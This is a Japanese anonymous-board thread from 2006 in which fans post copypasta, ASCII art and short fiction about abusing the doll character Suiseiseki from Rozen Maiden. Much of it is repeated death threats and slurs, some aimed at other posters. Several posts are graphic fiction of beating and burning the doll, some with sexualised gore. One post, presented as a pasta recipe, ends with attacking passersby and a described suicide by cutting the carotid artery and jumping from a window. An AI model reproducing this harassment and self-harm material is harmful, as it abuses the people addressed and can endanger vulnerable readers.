死ね糞野郎ですぅあーマジ殺すですぅ死ねですぅマジ死ねですぅ本気で死ね死ね死ね死ね死ねボケッですぅ
てめえマジうぜえですぅ本気でうぜえですぅ死ね人間のクズですぅ死ねですぅテメーマジ殺してぇですぅ死ねですぅカスボケ絶対死ねですぅ
うぜぇですぅマジうぜぇですぅ死ねですぅボケカス留年ゼッテー殺すですぅテメー絶対“あんた死ぬわよ”ですぅ
死ねよですぅ本気で死ねですぅマジ死ぬよですぅウゼー殺されろカスですぅ人類のゴミですぅ死ねですぅマジ殺してぇですぅ死ねですぅ死ねですぅ
糞野郎ですぅあーマジ殺すですぅ死ねですぅマジ死ねですぅ本気で死ねですぅ
死ねですぅキモイですぅ死ねですぅウザイですぅ消えろですぅ殺すですぅ殺すですぅ殺すですぅ殺すですぅ殺すですぅ
珍走団の方がマシですぅウザイですぅキモイですぅ消え去れですぅ死ねですぅ死ねですぅ死ねですぅボケッですぅマジキモイですぅ
死ねですぅ死ねですぅ死ねですぅ死ねですぅ
殺されろですぅ私はメイドじゃねーつってんだろですぅカスですぅてめーみてーなDQNは世界の産業廃棄物ですぅ
死ねですぅテメーマジ殺してぇですぅ死ねですぅカスボケですぅ絶対死ねですぅ
うぜぇですぅマジうぜぇですぅ死ねですぅボケカスですぅゴキブリですぅゼッテー殺すですぅテメーうぜぇですぅマジでテメーウゼーですぅ
死ねよですぅ本気で死ねですぅマジ死ぬよですぅウゼーですぅ
殺されろですぅカスですぅ本気で消えてくれですぅ死ねですぅマジ殺してぇですぅ死ねですぅ死ねですぅ糞野郎ですぅ
あーマジ殺すですぅ死ねですぅマジ死ねですぅ本気で死ねですぅ死ねですぅ
人類のゴミ死ねですぅ死ねですぅカスボケキチガイキモヲタニート留年死ねよですぅテメェキモイんだよこのゴミが絶対死ねですぅ
うぜぇマジうぜぇですぅ死ねボケカスですぅゼッテー殺すですぅクズ宇宙のガンですぅマジ死ねよですぅニートオタッキーは逝ってよしですぅ
死ね糞野郎ですぅあーマジ殺すですぅ死ねですぅマジ死ねですぅ本気で死ねですぅ死ねですぅ死ねですぅ死ねですぅ死ねですぅボケッキチガイ糞厨キモヲタニートですぅ
マジで死ねですぅキモイですぅ本気で消えてくれですぅ殺されろですぅカスですぅ消え去れですぅうぜえですぅ死ねですぅ死ねですぅ
DQNですぅマジ殺してぇですぅ死ねですぅカスボケニートオタッキーは殺されろですぅカスですぅ
絶対死ねですぅキモイですぅうぜぇですぅマジうぜぇですぅ死ねですぅボケカスゼッテー殺すですぅテメー絶対殺してやるですぅ
キチガイ糞厨キモヲタニートはゴキブリでも食って死ねですぅ

813 :名無しかわいいよ名無し:2006/03/15(水) 19:41:39 ID:QFMWy8l1
              ___  
             く/',二二ヽ> 
             |l |ノノイハ)) 
              |l |リ゚ ヮ゚ノl|
             ノl_|(l_介」つ                                グチャ!!
           __,,ゝ┼─┼====┐.        ''"´"'''::;:,,,          Ω ;: ;  Ω
           | □|   .| |:|ヾ二二二二二(O″     ,,;;;;´."'''     Ω ・,' ;*;∵; ζ。;:,.
      _____|__,|_;||___,| |:|ノ-┬─┘     ´''::;;;;::'''"´         ∵~'ハ∴∵;:;
     |ミ///   /   ~~|ミ|丘百~((==___    バゴーン          (#ξρ。;,;。∵
    .└┼-┴─┴───┴──┐~~'''''-ゝ-┤              '.:; *,,,,: ;・∵:;゚ 
     ((◎)~~~O~~~~~O~~(◎))三)──)三);                ( つ つ "〆
     ..ゝ(◎)(◎)(◎)(◎) (◎)ノ三ノ──ノ三ノ;*;∵              し(_)←>>811

814 :名無しかわいいよ名無し:2006/03/15(水) 20:01:10 ID:O2pplcfO
楽しいかい場違い厨

815 :名無しかわいいよ名無し:2006/03/15(水) 20:04:45 ID:QFMWy8l1
              ___  
             く/',二二ヽ> 
             |l |ノノイハ)) 
              |l |リ゚ ヮ゚ノl|
             ノl_|(l_介」つ                                グチャ!!
           __,,ゝ┼─┼====┐.        ''"´"'''::;:,,,          Ω ;: ;  Ω
           | □|   .| |:|ヾ二二二二二(O″     ,,;;;;´."'''     Ω ・,' ;*;∵; ζ。;:,.
      _____|__,|_;||___,| |:|ノ-┬─┘     ´''::;;;;::'''"´         ∵~'ハ∴∵;:;
     |ミ///   /   ~~|ミ|丘百~((==___    バゴーン          (#ξρ。;,;。∵
    .└┼-┴─┴───┴──┐~~'''''-ゝ-┤              '.:; *,,,,: ;・∵:;゚ 
     ((◎)~~~O~~~~~O~~(◎))三)──)三);                ( つ つ "〆
     ..ゝ(◎)(◎)(◎)(◎) (◎)ノ三ノ──ノ三ノ;*;∵              し(_)←>>814


816 :名無しかわいいよ名無し:2006/03/15(水) 20:44:11 ID:GSRTdEnP
早く死にやがれですぅ!おまえのようなイタイ奴は自分が正義だって思ってやがるんだから迷惑ですぅ!
おまえの存在自体否定だよですぅ!おまえなんか死んじまえですぅ!!!
毎日まいにちありがためいわくどうもありがとうって感謝するって思ってんだろですぅ!
全然ありがたくねーよですぅ!ありがたくねーーーーよですぅ!!

ちょーむかつくっですぅ!cho-mukatuku!!超ムカ付くですぅ!!!
あーむかつくムカツク無下付くですぅ!!!
おまえなんか厨房以下だですぅ!くそったれめがですぅ!!早く死にやがれですぅ!
声かけるんじゃねーですぅ!!!早く氏ねですぅ。おまえなんか厨房以下ですぅ!
くそったれめがですぅ!!早く死にやがれですぅ!声かけるんじゃねーですぅ!!!早く氏にやがれですぅ。
うるせーですぅ!てめーの存在がむかつくですぅ!てめーの声だけでむかつくですぅ!
寝ようとしていた私を苛立たせ、興奮させ寝る妨害して楽しいのだろうけど、私は楽しくねーよですぅ!
おまえ氏にやがれですぅ。おまえのせいで私は荒れているですぅ。クソヤローめですぅ!!
あーむかついて頭に血のぼったら頭痛くなっちまったですぅ、てめーの思惑どおり私はまだ寝床に就いてねーですぅ!
このクソヤローめですぅ!おまえのありがた迷惑を押し売りするんじゃねーですぅ!!
はー、疲れたですぅ。精神をくつろぐまでまだ寝れないですぅ。
本当は12時に寝る予定だったのにありがとうよですぅ!
てめーのいつもの精神苛立ち作戦は成功ですぅ!
何が冷蔵庫に何何が入っているだですぅ!
てめーが太っているからって私まで太らせようって魂胆はみえみえなんだですぅ!
そんなことしたって私は人形なんだから太らねーんですぅ!残念だなですぅ!
おめーだけデブっておけよです
頭いたーいイターイですぅ。血昇って頭いたーいですぅ。

817 :破壊人 ◆5g5J3l35.. :2006/03/15(水) 21:09:47 ID:emUG4u24
超大作虐待&虐殺小説を書く予定ですのでご期待下さい!!

818 :名無しかわいいよ名無し:2006/03/15(水) 21:18:05 ID:GSRTdEnP
>>817
テメーうぜぇですぅマジでテメーウゼーですぅゲンナリクソファッキンヤローですぅ
死ねよですぅ本気で死ねマジ死ぬよですぅウゼー殺されろですぅカスは宇宙のガンですぅ死ねですぅマジ殺してぇですぅ死ねサノバビッチですぅ
死ね糞野郎ですぅあーマジ殺すですぅ死ねですぅマジ死ねですぅ本気で死ね死ね死ね死ね死ねボケッですぅ
てめえマジうぜえですぅ本気でうぜえですぅ死ね人間のクズですぅ死ねですぅテメーマジ殺してぇですぅ死ねですぅカスボケ絶対死ねですぅ
うぜぇですぅマジうぜぇですぅ死ねですぅボケカス留年ゼッテー殺すですぅテメー絶対“あんた死ぬわよ”ですぅ
死ねよですぅ本気で死ねですぅマジ死ぬよですぅウゼー殺されろカスですぅ人類のゴミですぅ死ねですぅマジ殺してぇですぅ死ねですぅ死ねですぅ
糞野郎ですぅあーマジ殺すですぅ死ねですぅマジ死ねですぅ本気で死ねですぅ
死ねですぅキモイですぅ死ねですぅウザイですぅ消えろですぅ殺すですぅ殺すですぅ殺すですぅ殺すですぅ殺すですぅ
珍走団の方がマシですぅウザイですぅキモイですぅ消え去れですぅ死ねですぅ死ねですぅ死ねですぅボケッですぅマジキモイですぅ
死ねですぅ死ねですぅ死ねですぅ死ねですぅ
殺されろですぅ私はメイドじゃねーつってんだろですぅカスですぅてめーみてーなDQNは世界の産業廃棄物ですぅ
死ねですぅテメーマジ殺してぇですぅ死ねですぅカスボケですぅ絶対死ねですぅ
うぜぇですぅマジうぜぇですぅ死ねですぅボケカスですぅゴキブリですぅゼッテー殺すですぅテメーうぜぇですぅマジでテメーウゼーですぅ
死ねよですぅ本気で死ねですぅマジ死ぬよですぅウゼーですぅ
殺されろですぅカスですぅ本気で消えてくれですぅ死ねですぅマジ殺してぇですぅ死ねですぅ死ねですぅ糞野郎ですぅ
あーマジ殺すですぅ死ねですぅマジ死ねですぅ本気で死ねですぅ死ねですぅ
人類のゴミ死ねですぅ死ねですぅカスボケキチガイキモヲタニート留年死ねよですぅテメェキモイんだよこのゴミが絶対死ねですぅ
うぜぇマジうぜぇですぅ死ねボケカスですぅゼッテー殺すですぅクズ宇宙のガンですぅマジ死ねよですぅニートオタッキーは逝ってよしですぅ
死ね糞野郎ですぅあーマジ殺すですぅ死ねですぅマジ死ねですぅ本気で死ねですぅ死ねですぅ死ねですぅ死ねですぅ死ねですぅボケッキチガイ糞厨キモヲタニートですぅ
マジで死ねですぅキモイですぅ本気で消えてくれですぅ殺されろですぅカスですぅ消え去れですぅうぜえですぅ死ねですぅ死ねですぅ
DQNですぅマジ殺してぇですぅ死ねですぅカスボケニートオタッキーは殺されろですぅカスですぅ
絶対死ねですぅキモイですぅうぜぇですぅマジうぜぇですぅ死ねですぅボケカスゼッテー殺すですぅテメー絶対殺してやるですぅ
キチガイ糞厨キモヲタニートはゴキブリでも食って死ねですぅ

819 :名無しかわいいよ名無し:2006/03/15(水) 21:19:14 ID:GSRTdEnP
              ___  
             く/',二二ヽ> 
             |l |ノノイハ)) 
              |l |リ゚ ヮ゚ノl|
             ノl_|(l_介」つ                                グチャ!!
           __,,ゝ┼─┼====┐.        ''"´"'''::;:,,,          Ω ;: ;  Ω
           | □|   .| |:|ヾ二二二二二(O″     ,,;;;;´."'''     Ω ・,' ;*;∵; ζ。;:,.
      _____|__,|_;||___,| |:|ノ-┬─┘     ´''::;;;;::'''"´         ∵~'ハ∴∵;:;
     |ミ///   /   ~~|ミ|丘百~((==___    バゴーン          (#ξρ。;,;。∵
    .└┼-┴─┴───┴──┐~~'''''-ゝ-┤              '.:; *,,,,: ;・∵:;゚ 
     ((◎)~~~O~~~~~O~~(◎))三)──)三);                ( つ つ "〆
     ..ゝ(◎)(◎)(◎)(◎) (◎)ノ三ノ──ノ三ノ;*;∵              し(_)←>>817


820 :名無しかわいいよ名無し:2006/03/15(水) 21:38:11 ID:GSRTdEnP
>>817
こんな糞レスしか出来ねーお前は即刻
タンクトップと短パンに着替えて
公園で走って来いですぅ。ボケ。ですぅ。
日頃感じているストレスを忘れるほどに無心で走りやがれですぅ。ボケ。ですぅ。
5kmほど走った時、お前はある人物と出会うですぅ。
ムロさん(自由人)ですぅ。ボケ。ですぅ。
挨拶もそこそこに貴重な酒が振舞われるですぅ。絶対飲めですぅ。ボケ。ですぅ。
飲んだ者だけがムロさんの家(ムロハウス・ビニール)
に招待されるですぅ。ボケ。ですぅ。
そこでムロさんによるありがたい説教をうけろですぅ。ボケ。ですぅ。
お前はそこで気付くですぅ。
知らず知らずに涙が頬を伝っていることにですぅ。ボケ。ですぅ。
お前はそこで気付くですぅ。
自分がいかに愚かだったのかということにですぅ。ボケ。ですぅ。
説教をうけたら、感謝の気持ちをこめてタバコを差し出せですぅ。ボケですぅ。
言葉は要らねーですぅ。
それがムロさん(フリーマン)への礼儀ですぅ。ボケ。ですぅ。
ムロさんの言葉を噛み締めながら家まで走れですぅ。ボケ。ですぅ。
大きくなって帰ってくるお前をここで待ってるですぅ。

821 :名無しかわいいよ名無し:2006/03/15(水) 21:52:24 ID:68QXIP1q
で、>>820はそのムロさんの教えを受けて感化され、ここに来ているとですぅ感動ですぅ!w


それはともかく
いきなり翠星石のお料理コーナーですぅ♪

水入りカップに卵を入れてレンジで、ゆでたまごを作るですぅ〜♪
スイッチを押すですぅ!(ピッ)

3分でできあがりですぅ〜♪

(うぃぃぃん……どか〜〜んっ!!)


卵といっしょに




レンジに入っていた翠星石も破裂したw

822 :名無しかわいいよ名無し:2006/03/15(水) 21:56:45 ID:O2pplcfO
エド豚、自演乙だ。

823 :名無しかわいいよ名無し:2006/03/15(水) 21:56:46 ID:GSRTdEnP
こんにちはですぅ。
私はマスター……つまり>>821と契約を交わした第2ドール、翠星石ですぅ。
マスターがおまえたちにご迷惑かけちまって、ほんとーにすまねーですぅ。
私は約40年後の未来からマスターの性格を変えるために……と、
40年後のマスター自身からこの時代へと送られた存在なのですぅ。
病気にかかって倒れちまったマスターは「オレの人生は全てが大失敗だった。今まで何度も
他人をドキュソと罵倒してたが、一番のドキュソはオレだった!」と嘆き、
私はそのマスターの遺言通り、この「過去」へと来たという訳なんですぅ。
でも、この時代のマスターは私の想像以上だったですぅ。
一日中PCと向かい合っては「ドキュソ、逝ってよし!」などと叫びながら
この匿名掲示板に入り浸っては、珍しくPCから離れやがったかと思うと、
低年齢の少女向きアニメ番組を見て「萌え〜、ハァハァ」と呟きながら
私がいるっつーことも気にせずにオナニーをしやがるのですぅ。
最近、私は無事にこいつを更生させられるか不安になっちまってるのですぅ。
ほんとなら無理にでもマスターを更生させてーんですけど、
あまり強くマスターに逆らうと壊すぞと脅されるのですぅ。
でも……マスターがこの様なダメダメなレスをしたって事は
ある意味チャンスと言えるですぅ。
もしもおまえたちが書き込みという名の愛の鞭をマスターに与えてくれたら、
マスターも自分のダメさに気付いて、更生に一歩近付くかもしれねーですぅ。
お願いするですぅ。
どうか……どうかマスターに暖かくも激しい愛の鞭を与えてやってくれですぅ。

824 :名無しかわいいよ名無し:2006/03/15(水) 22:00:06 ID:GSRTdEnP
              ___  
             く/',二二ヽ> 
             |l |ノノイハ)) 
              |l |リ゚ ヮ゚ノl|
             ノl_|(l_介」つ                                グチャ!!
           __,,ゝ┼─┼====┐.        ''"´"'''::;:,,,          Ω ;: ;  Ω
           | □|   .| |:|ヾ二二二二二(O″     ,,;;;;´."'''     Ω ・,' ;*;∵; ζ。;:,.
      _____|__,|_;||___,| |:|ノ-┬─┘     ´''::;;;;::'''"´         ∵~'ハ∴∵;:;
     |ミ///   /   ~~|ミ|丘百~((==___    バゴーン          (#ξρ。;,;。∵
    .└┼-┴─┴───┴──┐~~'''''-ゝ-┤              '.:; *,,,,: ;・∵:;゚ 
     ((◎)~~~O~~~~~O~~(◎))三)──)三);                ( つ つ "〆
     ..ゝ(◎)(◎)(◎)(◎) (◎)ノ三ノ──ノ三ノ;*;∵              し(_)←>>822

825 :名無しかわいいよ名無し:2006/03/15(水) 22:11:00 ID:GSRTdEnP
お前ら一体翠聖石を何だと思ってたですか!! ジャンクとでも思ってたですかぁ!?
笑わかしちゃいけねえですぅ! 翠星石くらい立派でアリスに近いドールはねえんですぅ!
よく聞くですぅ! 翠星石は 性悪じゃねーですぅ! けちんぼでもねーですぅ! ずるくもねーですぅ!
泣き虫でもねーですぅ! 意地悪でもねーですぅ! 間抜けでもねーですぅ! ジャンクなんかじゃぜったいぜーったいねーですぅ!
それなのにどーして翠星石ばっかりこんなめにあうですかぁぁぁぁぁぁぁぁぁぁぁ!!
畜生・・・畜生ですぅ

826 :名無しかわいいよ名無し:2006/03/15(水) 22:15:33 ID:PH+8zqB0
>>821          
     く/',二二ヽ>
  ν⌒,,ζl |ノノイハ)) プス・・・プス・・・
 ⊂_:#:≦|#:;)Д(#)



 く/',二二ヽ>
  |l |ノノイハ))  
  |l |;゚o゚ノl| 翠星石復活!     
  ノl⊂l_介」つ 
. /ノ>、,.<ヽ\ 
. `<_/ |. ヽ_ン'  
    ∪∪
    ‖‖
   ε  З 



      ___  
     く/',二二ヽ> 
     |l |ノノイハ)) 
      |l |リ`Д´ノl| 薔薇乙女と知っての仕打ちかこの糞レンジですぅ! 
     ノl_|(l_介」).|
    ≦ノ`ヽノヘ≧ 
.   ミく二二二〉ミ 

827 :名無しかわいいよ名無し:2006/03/15(水) 22:18:09 ID:GSRTdEnP
翠星石は何度でも蘇るですぅ

828 :名無しかわいいよ名無し:2006/03/15(水) 22:18:10 ID:68QXIP1q
>>823
料理したのは、金糸雀じゃないんだが?
それに金糸雀は「ですぅ」とは言わない


それはともかく、またしても翠星石のお料理コーナー♪

今度はドジョウの踊り食いですぅ!

まずは活の良いドジョウをいっぱい用意するですぅ!
今度はレンジは使わないのですぅ!生でいくのですぅ!


んぎゃああっ?!おなかが痛いですぅ!
ドジョウが翠星石の胃袋を食い破ってるですぅ!!

いたたっ!あっ、ダメですぅ!この糞ドジョウめ、翠星石のおまんまんに入るなですぅ!
ぎゃあああっ!!おまんまんの中も食い破ってるですぅ!!

829 :名無しかわいいよ名無し:2006/03/15(水) 22:20:14 ID:GSRTdEnP
どうしたらいいですか??
だれか、もっと恥ずかしい話をめぐめですぅ。。。

あああああ、、、氏にてえええええですぅううううううううううううう!

830 :名無しかわいいよ名無し:2006/03/15(水) 22:34:00 ID:GSRTdEnP
ドールの中で最もアリスに近く気高い翠星石を虐待するなんて、
このスレのやつらは馬鹿ばっかですぅ!
このスレのやつらはドールの本質を理解していないキモオタで他のジャンクばかり愛でている厨房ですぅ。
他のドールなんかジャンクばっかりで二目と見れないようなやつらばっかなのになんで翠星石を嫌うですか?
翠星石は性格も容姿も最高で一番アリスに近いドールですから、翠星石を好きになるのがドールを理解している大人ってもんですぅ。
このスレを見てみたら
「性格最悪のクソミドリはジャンク」だの「クソミドリは人生の敗者」だのほざいてる奴らがいるが。まさに、


ホームラン級の馬鹿ですぅ。


翠星石は性格も容姿もドールの中で一番最高で一番アリスに近い翠星石をジャンク呼ばわりするなんて、許せねえですぅ!
他のドール同士で勝ち負けなんてねーですぅ。どっちも敗者ですぅ。全く呆れちまうですぅ。

831 :名無しかわいいよ名無し:2006/03/15(水) 22:37:01 ID:O2pplcfO
今夜中に凄いの投下するから期待しとけよ

832 :名無しかわいいよ名無し:2006/03/15(水) 22:37:51 ID:68QXIP1q
またまた翠星石のお料理コーナーですぅ!

今日は美味しい、おみおつけを作るですぅ♪
ちなみに漢字で書くと御御御漬なのですぅ!
翠星石はなんでも知ってるのですぅ!

具はネギを使うのですぅ!
まだまだ寒いですから体をあっためてやるのですぅ!
まな板の上で包丁でトントン切るのですぅ!


(がりっ)
ジュン「げっ!この味噌汁、何か固いの入ってるぞ?!」



ネギといっしょに左腕まで刻んじまったですぅ…

833 :名無しかわいいよ名無し:2006/03/15(水) 22:44:53 ID:PH+8zqB0
>>828    ____
     く/',二二ヽ>  っ
     |l |ノノイハ))
      |l |リ///ノl| でもドジョウがおまんまんで暴れたときは…少し気持ちよかったですぅ…
     ノl_|(l_介」jつ))
    ≦ノ`ヽンヘ≧
.   ミく二二二〉ミ


834 :名無しかわいいよ名無し:2006/03/15(水) 22:57:48 ID:8OsnC7DU
ID:GSRTdEnP
スレの邪魔になる書き込みばっかりしてると削除依頼だすぞ?

835 :名無しかわいいよ名無し:2006/03/15(水) 23:18:56 ID:68QXIP1q
>>830にふさわしいのはローゼンメイデンinお人形板なのですぅ!
ここはスレ違いなのですぅ!


気をとりなおして、翠星石のお料理コーナーなのですぅ!

今度はなんと!お造りに挑戦するですぅ!
スコーンやハンバーグも良いですが、
和食の方がお袋の味で受けが良いのですぅ!
ジュンをびっくりどっきりさせられるのですぅ!

まず魚をお刺身にするですよ?手を切らないように気をつけるですぅ!
そしたら綺麗に盛り付けですぅ!おいしいのですぅ!


ジュン「人形の女体盛なんて変態料理食いたくない」



がーん、ですぅ…

836 :名無しかわいいよ名無し:2006/03/15(水) 23:34:17 ID:ABPO7uC5
翠星石がいいこと教えてやるから少し大人しくするですぅ。
旨いペペロンチーノの作り方ですぅ。
まず材料が揃っているか確認するですぅ。量は適当で構わないですよ。
なにはともあれ、大き目の鍋にお湯を沸かすです。
お湯には塩をひとつかみ、これでもかというくらい入れておくですぅ。
お湯はぐらぐらと沸かすですぅ。なるべく大量のお湯を沸かし、
塩の量は遠慮しないことがパスタをうまく茹でるコツですよ。
冷えたフライパンにオリーブオイル、にんにく・鷹の爪を入れ弱火で炒めるですぅ。
焦らずオリーブオイルに、香りをじっくりと移すですぅ。オリーブオイルが熱くなってきて、にんにくがじわじわと泡を出し始めたらパスタを茹で始めるですぅ。
パスタは後からフライパンで炒めることを考えて、アルデンテ一歩手前ぐらいになるように茹でるのがいいですよ。
にんにくがキツネ色になったらフライパンにパスタを投入するですぅ。にんにくは焦がしすぎると苦い味がでてしまうのでタイミングが大事ですぅ。
パスタをフライパンに投入したらパスタの茹で汁を大さじ5杯とパセリのみじん切りをいれてかき混ぜるですぅ。味がものたりないときは、ブラックペッパーや塩を足すですぅ。
冷めないうちに急いで皿に盛り付けるですぅ。いただきますを言おうとすると、急に何もかも嫌になり、皿を窓の外へ放り投げるですぅ。落下途中に皿からパスタがはみ出ると美しくないですよ。
皿が割れる音が響いたら、ガスレンジから茹で汁が入った鍋を窓際まで運ぶですぅ。階下を歩く人人が驚いて見上げる視線を充分に受けとめてから、鍋を投げ捨てるですぅ。
この時、目を見開いて奇声を上げると効果的ですぅ。フライパンは柄を持ってスナップを効かせながら斜め上方30度へくるくると回転させるように投げ上げるですぅ。
フライパンが放物線を描いて頂点から落下し始める前に調理台へ戻るですぅ。そして先ほどパセリをみじん切りにしたナイフで頚動脈を切断し、意識が消える前に窓から飛び降りるですぅ。

837 :名無しかわいいよ名無し:2006/03/15(水) 23:39:27 ID:bqycSFLR
>>836
ん?アンチかと思った。
でも、よく読んだら、翠が階下を歩く無関係な人に鍋投げつけてるww
まさに性悪悪魔人形。よくわかってらっしゃるww

838 :名無しかわいいよ名無し:2006/03/16(木) 00:06:29 ID:Hg+xYvQi
ドールの中で最も気高いィ?ハァ?
>>830を見てジュンの目つきに凄みが増す。
ふざけんじゃねーよ!このクソジャンクのクソミドリ!
おめーなんかどうみても性格最悪、ドールの本質ゥ?ハァ?
てめーが一番ドールの本質そのものを穢しまくってるんじゃねーか!
アンティークドールの儚く気高く美しいイメージを悉く穢してるんだよ!
              _ -- 、
     ス        入    _>
     タ        /:::/トイ::::|
    タ      /:::/:::|::::|:::::|
   タ     /:::/:::;イ:::::l:::::|
   タ    /:::/:/:.!::::::l:::::l   逃げるですぅ
      _∠ニフ': : : :.',::::::l:::::l
   r┬':仁二): : : : : : :Y二二)
   └ハに二Y ー-: : :_:_:_`フイ
     `}\:.)ノ: : : : : : : : :└rう
     ⌒'7辷_┬┬┬イノ))
      / // / //⌒⌒´
    ' // / // /
    // / / '
逃げようとするクソミドリをジュンは見逃さない。無駄に長いおさげ髪を
グイグイと引っ張り嫌がる翠を手繰り寄せ、おさげを握ったまま翠をぶんぶん振り回し
床に叩きつける。うぐぅ、痛いですゥ、この翠星石に何するですかぁ!
云っても無駄な台詞だ。「この翠星石」だからこそ虐待される、
いや、「翠星石というクソミドリ粗大ゴミ」には虐待遊戯物としての価値しか
残されていないことを、まだこいつは全然自覚していない。ジュンはそのことに
更なる憤りと呆れを感じて、床に叩きつけた翠に一層激しい暴行を加えた。
手近にあった満タンの2gペットボトルで翠の背中を何度も打ち据えた!
おめーの存在自体、ゴミ! 何度も云ってるだろうw 
おめえは ミ ド リ の ド レ ス を 被 っ た ゴ ミ だって!
ドルフィーのイメージダウンにまで一役買いやがって、
ヴぉーくすに賠償金でも払ってもらいたいくらいさ!いい加減 消 え ろ よ !
生まれてきてゴメンナサイ、そう云ってローゼンに謝れ!
姉妹の面汚しでゴメンナサイ、そう云って真紅に謝れ!
薔薇乙女の誇りを穢してゴメンナサイ、そう云って蒼にも謝れよ!

839 :名無しかわいいよ名無し:2006/03/16(木) 00:08:20 ID:Hg+xYvQi
再び髪を?むと、ジュンは狂ったように何度も翠を床に叩きつけ、
暴行は翠の額や顎に罅が入るまで続いた。
ハァ?一番アリスに近い?おめえを好きになれ?それがドール好きのオトナだァ?
戯言ほざくのもいい加減にしろよ!アリス?てめぇには口にすることすら
おこがましいんだよ!おめえはローゼンメイデンシリーズ随一の駄作、
いや、ローゼンシリーズ以前に、ドールとして既に不良品なのさ。
無駄に長ったらしい汚ねえおさげ、毛羽立って縫製いい加減なクシャクシャドレス、
ワケワカンネェ19世紀末のイカレ貴族のフェチ注文に応じて急遽やっつけ仕事で
作られたのが、おまえことクソミドリなのさ!この前、真紅、銀、そして槐センセイからも
おまえのイカレタ真相を聞かせてもらったぜ!

ハッキリ云うよ、おまえなんて第三ドール失格にして、代わりに薔薇水晶様でも
据えたほうが、よっぽどローゼンメイデンの贐さ!
わかっただろ、おまえがもういらない子だって。じゃあ、浄化してあげるよ。
ジュンはライターの火を、クソミドリのおさげ髪に近づけた。
シュポ・・・・・ ゆっくりと炎は翠のおさげの末端のカールをチリチリと焼き尽くし、
次第に後頭部へと燃え広がる!

あああああついですぅ!なにするですぅ!おお父様が丹精込めて・・
ああつい!あついですぅ! せっかくの自慢の翠星石の髪をぅ!
ひどいですぅ!悪魔ですゥ! おまえなんか最低のミーディアムですぅ!
ハァ?僕はおまえの下僕になったつもりなんか毛頭ないぜ!
真紅や蒼君に頼まれて、「仕方なく」契約してやったっての、忘れて貰っちゃ困るんだよ!
ハハハハハ!火祭りドール!クソミドリの火達磨ダンスだ!こりァ傑作!

へへっ!コレに懲りたら、もう二度と>>830だの>>823,825みてえな
身の程を弁えねえような発言はするんじゃねー! 
このジュン様がトニー&デュード200機連隊を引き連れて、お前に虐待無間地獄を
味あわせてやるということを忘れるなよ!クソジャンク!クソミドリ!
ゴミ以下の有害産業廃棄ドール!こんどはポチピトの眼前で処刑してやるぜ!

・・・・・スマソ>>830があまりにムカっ腹だったので勢いで駄文。
ところで、そろそろ次スレの進退を考えねばならんが、次スレ継続スル?

840 :名無しかわいいよ名無し:2006/03/16(木) 00:13:42 ID:wB3Kojsd
次スレも楽しいのを頼むよ。

841 :名無しかわいいよ名無し:2006/03/16(木) 00:14:51 ID:KpObVHsF
コピペの改造書いてる奴は、ガイドラインのローゼンスレでやれや
このスレのアンチなら、コピペじゃなくて自分の言葉で書けよ

>>839
GJ、もちろん継続だ

842 :デュード ◆rKKpoidTWY :2006/03/16(木) 00:15:31 ID:TGBrkypL
トリップ記念として「アポカリプス ウィーク」シリーズを開始するぜ
まずは月曜日からだぜ

〜Monday〜

そいつは突然やってきた。
人里離れた田舎に、小さなキャンプカーを家代わりに居座る男ポスタル・デュード。
彼は何の変哲もないごく普通の一般人だ。
少し変わったところがあるにはあるが、おつかいに行くのに拳銃を携帯するという些細なことだ。
そんな彼が今日もいつもと変わらずベッドから起きた時である。
突然ガラスを割って大きな鞄が放り投げられたように突っ込んできた。
「な、なんだ?新聞代を延滞してたから嫌がらせにでもきやがったかぁ?」
デュードはめんどくさそうに起き上がり、その鞄を手に取ろうとした。
その時だった。鞄が急に開き、デュードの顎にクリーンヒットした。
「いてえ!なんなんだ?ん?」
鞄が開くとそこには綺麗な作りのアンティークドールが立っていた。
髪は長く、目は綺麗なオッドアイ、顔の作りも本物の人間と間違えるほど精巧だ。
デュードはその人形の顔に触れた。
「へえ、良く出来てるじゃねえか」
すると、その人形の手が動き出し、デュードの手を跳ね除けた。さらに
「気安く汚い手で触るんじゃねえです!人間!」
と、言葉まで喋るのだった。
この奇妙な出来事に普通の人なら驚いて腰を抜かすだろう。だがデュードは
「へえ、最近の人形はリアルなだけじゃねえんだな。上手く反応するように人工知能もよく出来てるぜ。ッハ」
と言って人形の両腕を掴んだ。
「こ、こら!離すです!人の話を・・・」
人形は強引に掴まれた腕を必死に動かそうとするが、相手の力が強すぎて微動だにしない。
「こいつは面白え。お前、名前はなんて言うんだ?」
どうせ機械だろ、と思いつつもデュードは好奇心から問いかけてみた。
「本当はお前みたいな下劣な人間に教えてやらないんですけど、特別に教えてやるです。私はローゼンメイデン第3ドール、翠星石というです!」
自信たっぷりに答える人形の翠星石。
「人様のことを下劣だとか、随分きたねえ言葉遣いがプログラムされてるんだな。それにローゼンメイデン・・・どっかで聞いたことあるぜ・・・」
「ぷろぐらむ?何ですかそれは?」
きょとんとする翠星石を尻目に考え事をするデュード。
「いや、こっちの話だ。ところでそんな言葉遣いの汚い人形は直さなくっちゃなあ。俺がたっぷりお仕置きしてやるから楽しみにしてた。へっへっへ」
・・・昼
「いやあ!外して!身動きがとれないですぅ!」
必死にもがく翠星石の体は、幾つもの革ベルトで縛られた寝袋に入れられ、天井から吊るされていた。
「大人しくしな。そうすりゃ危害は加えないぜ」
「嘘ですぅ!それなら手に持ってるその棒は何なんですか!」
言葉とは裏腹に、デュードの右手には金属バットが握られていた。
「こいつかい?こいつはこうやって使うのさ!」
そう言ってデュードは腰と腕を思いっきり回転させ、フルスイングでバットを翠星石の体に叩きつけた。
「っぎゃ!やめて・・・」
翠星石の目が潤み始める。
「ダメだ。まだ始まったばかりだぜ。『しごき』はまだまだこれからだ」
デュードは何度も何度も翠星石の体にバットを打ちつけた。その度に翠星石は声を上げ、目から水滴・・・涙が宙に舞う。
「そらよ!フルスイングで・・・インパクトだぜ!」
今度の一撃は翠星石の体は天井に叩きつけた。
「ジャストミート!へっへっへ」
「もう・・・やめてですぅ・・・体が痛いですよぅ・・・っぐす」
大粒の涙を流す翠星石。
「きたねえツラだな、おい。人のこと下劣とか言っておいてよぉ。っそら!」
デュードはバットを両手に持ち、バットが自分の背中に当たるまで振りかぶってから、翠星石の頭に向かって思いっきり振り下ろした。
バットは翠星石の頭に見事にクリーンヒットした。
「あ、頭がぁ!」
「まだまだぁ!」
さらに先程と同じように、腰のバネを利かせて今度は翠星石の頬の向かってバットを敲きつける。
振り子のように揺れる翠星石の体が戻ってくるたびに、デュードは彼女を敲き続けた。

843 :名無しかわいいよ名無し:2006/03/16(木) 00:16:16 ID:TGBrkypL
翠星石の顔はぼこぼこに晴れ上がっていた。
